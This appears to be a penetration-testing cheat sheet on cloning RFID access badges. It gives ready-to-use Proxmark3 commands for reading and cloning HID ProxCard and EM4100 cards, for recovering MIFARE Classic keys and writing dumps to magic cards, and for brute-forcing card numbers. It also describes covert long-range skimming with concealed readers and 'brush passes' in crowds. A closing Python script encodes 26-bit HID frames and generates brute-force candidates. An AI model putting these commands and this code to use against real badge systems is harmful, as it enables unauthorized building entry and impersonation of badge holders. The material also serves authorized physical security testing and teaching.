Badge Cloning & RFID Attacks
Exploitation
Electronic access control systems authenticate people with RFID/NFC badges. Many legacy credentials (125 kHz proximity cards and MIFARE Classic) carry a static identifier with no cryptographic challenge, so reading the badge once is enough to clone it onto a blank card or replay it from an emulator.
RFID/NFC Badge Types
| Frequency | Type | Common Use | Clone Difficulty |
|---|---|---|---|
| 125 kHz | HID ProxCard | Legacy access | Easy |
| 125 kHz | EM4100 | Basic access | Easy |
| 13.56 MHz | MIFARE Classic | Access/transit | Medium |
| 13.56 MHz | MIFARE DESFire | Secure access | Hard |
| 13.56 MHz | iCLASS | HID high security | Medium-Hard |
Proxmark3 Commands
Reading Badges
```bash
proxmark3> lf search   # Detect and identify a low-frequency (125 kHz) tag
proxmark3> hf search   # Detect and identify a high-frequency (13.56 MHz) tag
```
Clone HID ProxCard (125 kHz)
```bash
proxmark3> lf hid read          # Read the card (Iceman firmware: lf hid reader)
proxmark3> lf hid clone [ID]    # Write the raw ID to a T5577 blank (Iceman: lf hid clone -r [RAW], or -w H10301 --fc [FC] --cn [CN])
```
Clone EM4100 (125 kHz)
```bash
proxmark3> lf em 410x read        # Read the 40-bit EM4100 ID (Iceman firmware: lf em 410x reader)
proxmark3> lf em 410x clone [ID]  # Write it to a T5577 blank (Iceman: lf em 410x clone --id [ID])
```
MIFARE Classic Attack
```bash
proxmark3> hf mf autopwn   # Run darkside/nested/hardnested key recovery and dump the card
proxmark3> hf mf dump      # Dump all sectors with the recovered keys
proxmark3> hf mf restore   # Write the dump back; use a UID-changeable ("magic") card, since block 0 (UID) of a genuine Classic is read-only
```
Brute Force Card Numbers
```bash
proxmark3> lf hid brute -w H10301 --fc [FC] --cn [CN]   # Iceman: emulate card numbers walking up and down from CN with the facility code fixed (26-bit: only 65536 CNs per FC)
```
Flipper Zero (Portable Alternative)
- 125kHz → Read → Save
- 125kHz → Saved → Emulate
- NFC → Read → Save & Emulate
Long-Range Reading Techniques
- Use a larger, long-range 125 kHz antenna: the stock Proxmark3 coil reads at a few cm, a long-range reader coil extends this to 25+ cm
- Concealed reader in bag/clipboard
- "Brush pass" technique in crowds
Badge Format (HID Example)
HID badges encode FC (Facility Code) + CN (Card Number). The most common format, H10301 (26-bit Wiegand), is: 1 even-parity bit over the next 12 bits, an 8-bit FC (0-255), a 16-bit CN (0-65535), and 1 odd-parity bit over the preceding 12 bits. Nothing in the frame is secret: whoever reads the 26 bits, or guesses the FC and CN, holds the credential.
Example: FC:100 CN:12345
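The encoder/decoder below is an added example (not Proxmark3 or HID code) showing why a 26-bit H10301 badge is trivially cloneable and brute-forceable: it builds the frame with both parity bits from an FC/CN pair, decodes and parity-checks a captured frame, and produces the raw value a Proxmark3 clone command takes. The raw format assumes the Proxmark3 convention of a leading 1 at bit 26 plus bit 37 set in the 44-bit HID representation, which reproduces the widely cited Proxmark3 example of FC 118 / CN 1603 giving 2006ec0c86. `cn_walk` generates the neighbouring card numbers a brute-force such as `lf hid brute` steps through; the sample FC/CN values are constructed for illustration.

```python
"""H10301 (26-bit Wiegand) badge frame encoder/decoder.

Layout, MSB first:
  bit 1       even parity over bits 2-13
  bits 2-9    facility code (8 bits)
  bits 10-25  card number (16 bits)
  bit 26      odd parity over bits 14-25
"""


def _popcount(x: int) -> int:
    return bin(x).count("1")


def h10301_encode(fc: int, cn: int) -> int:
    """Return the 26-bit frame for a facility code and card number."""
    if not 0 <= fc <= 0xFF:
        raise ValueError("facility code must fit in 8 bits")
    if not 0 <= cn <= 0xFFFF:
        raise ValueError("card number must fit in 16 bits")
    payload = (fc << 16) | cn          # the 24 data bits
    left = payload >> 12               # FC + top 4 bits of CN (bits 2-13)
    right = payload & 0xFFF            # low 12 bits of CN (bits 14-25)
    even = _popcount(left) & 1         # set so that bits 1-13 contain an even number of ones
    odd = 1 - (_popcount(right) & 1)   # set so that bits 14-26 contain an odd number of ones
    return (even << 25) | (payload << 1) | odd


def h10301_decode(frame: int) -> tuple:
    """Return (fc, cn) from a 26-bit frame; raise ValueError if parity is wrong."""
    if frame >> 26:
        raise ValueError("not a 26-bit frame")
    even = frame >> 25
    odd = frame & 1
    payload = (frame >> 1) & 0xFFFFFF
    left = payload >> 12
    right = payload & 0xFFF
    if (_popcount(left) + even) % 2 != 0:
        raise ValueError("even parity mismatch")
    if (_popcount(right) + odd) % 2 != 1:
        raise ValueError("odd parity mismatch")
    return payload >> 16, payload & 0xFFFF


def proxmark_hid_raw(frame: int) -> str:
    """Raw hex for a 26-bit card as used by Proxmark3 HID clone commands.

    Assumption: Proxmark3 prints the 44-bit HID raw with bit 37 set and a
    leading 1 at bit 26 in front of the frame (FC 118 / CN 1603 -> 2006ec0c86).
    """
    return f"{(1 << 37) | (1 << 26) | frame:010x}"


def cn_walk(fc: int, cn: int, steps: int) -> list:
    """Card numbers a brute-force would try: cn, cn+1, cn-1, cn+2, ... within FC.

    Returns (card_number, proxmark_raw) pairs; CNs outside 16 bits are skipped.
    """
    candidates = [cn]
    for i in range(1, steps + 1):
        for c in (cn + i, cn - i):
            if 0 <= c <= 0xFFFF:
                candidates.append(c)
    return [(c, proxmark_hid_raw(h10301_encode(fc, c))) for c in candidates]


if __name__ == "__main__":
    # Constructed sample: FC 100 / CN 12345 from the page, and the Proxmark3 example card
    for fc, cn in ((100, 12345), (118, 1603)):
        frame = h10301_encode(fc, cn)
        print(f"FC {fc:3d} CN {cn:5d} -> wiegand {frame:026b} -> raw {proxmark_hid_raw(frame)}")
        print("  decodes to", h10301_decode(frame))
    print("brute-force neighbours of FC 118 / CN 1603:", cn_walk(118, 1603, 2))
```

The whole credential space is 2^24 valid frames, and with a facility code learned from one legitimate badge only 65536 card numbers remain, which is why the reader-side brute force in the previous section is practical against readers without rate limiting.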